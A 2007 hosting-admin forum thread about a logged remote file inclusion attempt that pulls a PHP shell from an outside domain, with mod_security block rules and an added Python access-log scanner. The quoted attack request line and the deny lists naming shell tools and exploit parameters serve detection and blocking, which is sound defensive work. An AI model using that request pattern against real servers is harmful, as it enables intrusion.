The Community Forums


Mod_Sec Log with globizgroup.com in it

Discussion in 'General Discussion' started by isputra, Mar 29, 2007.

  1. isputra

    isputra Well-Known Member

  2. tanfwc

    tanfwc Well-Known Member

    You might want to drop an email to their webmaster and inform them about this.
     
  3. isputra

    isputra Well-Known Member

    Email sent but no response
     
  4. Infopro

    Infopro cPanel Sr. Product Evangelist
    Staff Member

    globizgroup.com has a hack script on it; it is from:

    globizgroup.com (195.70.36.180)

    195.70.36.0 - 195.70.36.255
    InterWare Inc.
    IPs for Server Hosting


    InterWare Network Administration
    InterWare Inc.
    Victor Hugo u. 18-22.
    H-1132 Budapest
    Hungary
    +36 1 4525300
    +36 1 4525301


    I think it's safe to say this one could be blocked, not talked to.

    IMO of course...
     
  5. ramprage

    ramprage Well-Known Member

    It's just another PHP shell backdoor variant. I've seen hundreds of these before, nothing really different about this one.

    Ensure you have a good mod_security ruleset running to block this. Also proper system security measures applied like locking system binaries and disabling PHP functions will keep things like this from damaging your server.
     
  6. isputra

    isputra Well-Known Member

    Infopro: IPs are already banned from my server, but it seems that they use another IP to attack my server

    IP
    147.83.200.242

    GET
    /archives/2005/03/07/perang-digital-dengan-malaysia/index.php?t=http://globizgroup.com/.img/dog.c? HTTP/1.1

    ramprage: yes, I already blocked this using a mod_sec ruleset


    When googling globizgroup.com I found that I am not the only one who has this problem :D

    See it here: http://www.google.co.id/search?q=globizgroup.com
     
  7. AlexandreVeezon

    AlexandreVeezon Well-Known Member

    Just to add to the information, you can add a rule to block the URL too:

    /etc/modsecurity/rules.conf
    Code:
    SecFilterSelective HTTP_Referer|ARGS "domain\.com"
    Hope you already solved the issue :)
     
  8. rogcan

    rogcan Well-Known Member


    So to block out a website like globizgroup.com, would it be done like this?
    SecFilterSelective HTTP_Referer|ARGS "globizgroup\.com"
    Just want to make sure I'm doing this right, so my apologies for the silly question.

    I also don't have that rules.conf file or a modsecurity folder where you say it is, but I do have mod_security installed as an addon.
    So I'm assuming the location to put this in is /usr/local/apache/conf/modsec.user.conf instead of /etc/modsecurity/rules.conf, correct?
     
    #8 rogcan, Apr 25, 2007
    Last edited: Apr 25, 2007
  9. AlexandreVeezon

    AlexandreVeezon Well-Known Member

    I installed mod_security manually, not as the WHM addon.
    But you just need to add the line to your modsec config file.
    If you don't know which file it is, just open your httpd.conf file and look for

    Code:
    #Application protection rules
    Include /etc/modsecurity/rules.conf
    
    Edit this file and put the line in there.

    Here, some examples:

    Code:
    SecFilter "chmod" "deny,log"
    SecFilter "perl\%20" "deny,log"
    SecFilter "lynx\%20" "deny,log"
    SecFilter "mosConfig_absolute_path" "deny,log"
    SecFilter "sndir" "deny,log"
    SecFilter "pagename" "deny,log"
    SecFilter "phpbb_root_path" "deny,log"
    SecFilter "cmd" "deny,log"
    SecFilter "PGV_BASE_DIRECTORY" "deny,log"
    
    SecFilterSelective THE_REQUEST "perl " deny
    SecFilterSelective THE_REQUEST "mosConfig_absolute_path" deny
    
    SecFilterSelective HTTP_Referer|ARGS "tinypath\.com"
    SecFilterSelective HTTP_Referer|ARGS "hce\.edu\.vn"
    SecFilterSelective HTTP_Referer|ARGS "molganinovo\.ru"
    SecFilterSelective HTTP_Referer|ARGS "siaol\.com\.ua"
    SecFilterSelective HTTP_Referer|ARGS "globalsquid\.com"
    
    And answering your question, you are correct, you just have to add the line as you typed it here:

    Code:
    SecFilterSelective HTTP_Referer|ARGS "globizgroup\.com"
    After this, just look at the modsec_debug_log if you have it enabled in httpd.conf (look for debug level 1 in the modsec section of your httpd.conf)

    Hope this will help you :D
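
As an added example (not code from this thread, from cPanel or from ModSecurity), the same two checks the SecFilterSelective rule above performs, applied offline to access-log lines: a blocked domain in the Referer header or in any query argument (with the dot escaped, as in the rule), plus the remote-include shape seen earlier in the thread, where a query argument carries a full http:// URL. The log lines are constructed; the 147.83.200.242 address and the request path are the ones posted above, while the 10.0.0.x addresses and the evil.globizgroup.com referer are made up for the sample.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed combined-format access-log lines (sample data, not a real log).
SAMPLE_LOG = """\
147.83.200.242 - - [29/Mar/2007:10:12:01 +0700] "GET /archives/2005/03/07/perang-digital-dengan-malaysia/index.php?t=http://globizgroup.com/.img/dog.c? HTTP/1.1" 200 5123 "-" "Mozilla/4.0"
10.0.0.5 - - [29/Mar/2007:10:12:05 +0700] "GET /index.php?page=about HTTP/1.1" 200 2048 "http://example.test/" "Mozilla/5.0"
10.0.0.6 - - [29/Mar/2007:10:12:09 +0700] "GET /blog/?ref=globizgroupXcom HTTP/1.1" 200 1024 "-" "curl/7.15"
10.0.0.7 - - [29/Mar/2007:10:12:11 +0700] "GET /?id=1 HTTP/1.1" 200 900 "http://evil.globizgroup.com/x" "Mozilla/5.0"
"""

# ip ident user [time] "METHOD TARGET PROTO" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'\d+ \S+ "(?P<referer>[^"]*)" '
)

# Domains to block; re.escape makes the dot literal, like "globizgroup\.com"
# in the rule, so "globizgroupXcom" does not match.
BLOCKED = ["globizgroup.com"]
BLOCKED_RE = re.compile("|".join(re.escape(d) for d in BLOCKED), re.IGNORECASE)

# A query argument whose value is an absolute URL: the remote-include pattern.
RFI_RE = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)

def classify(line):
    """Return the reasons a line would have been denied; empty list means clean."""
    m = LOG_RE.match(line)
    if not m:
        return ["unparseable"]
    reasons = []
    referer = m.group("referer")
    args = parse_qsl(urlsplit(m.group("target")).query, keep_blank_values=True)
    # Equivalent of: SecFilterSelective HTTP_Referer|ARGS "globizgroup\.com"
    if BLOCKED_RE.search(referer) or any(BLOCKED_RE.search(v) for _, v in args):
        reasons.append("blocked-domain")
    for name, value in args:
        if RFI_RE.match(value):
            reasons.append("remote-url-in-arg:" + name)
    return reasons

def scan(log_text):
    """Map client IP -> accumulated reasons for every flagged line."""
    flagged = {}
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        ip = m.group("ip") if m else "unparsed"
        reasons = classify(line)
        if reasons:
            flagged.setdefault(ip, []).extend(reasons)
    return flagged

if __name__ == "__main__":
    for ip, why in scan(SAMPLE_LOG).items():
        print(ip, why)
```

Running it prints the two flagged clients; the "globizgroupXcom" line stays clean, which is the reason the rule escapes the dot.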
     
  10. rogcan

    rogcan Well-Known Member

    Appreciate the confirmation _xandih :)
     
  11. AlexandreVeezon

    AlexandreVeezon Well-Known Member

    ;D

    We're here to help each other, right?!
    Regards!
    see ya!
     
  12. rogcan

    rogcan Well-Known Member

  13. AlexandreVeezon

    AlexandreVeezon Well-Known Member

    Good!

    Added these to my rules :D

    Thank you!
     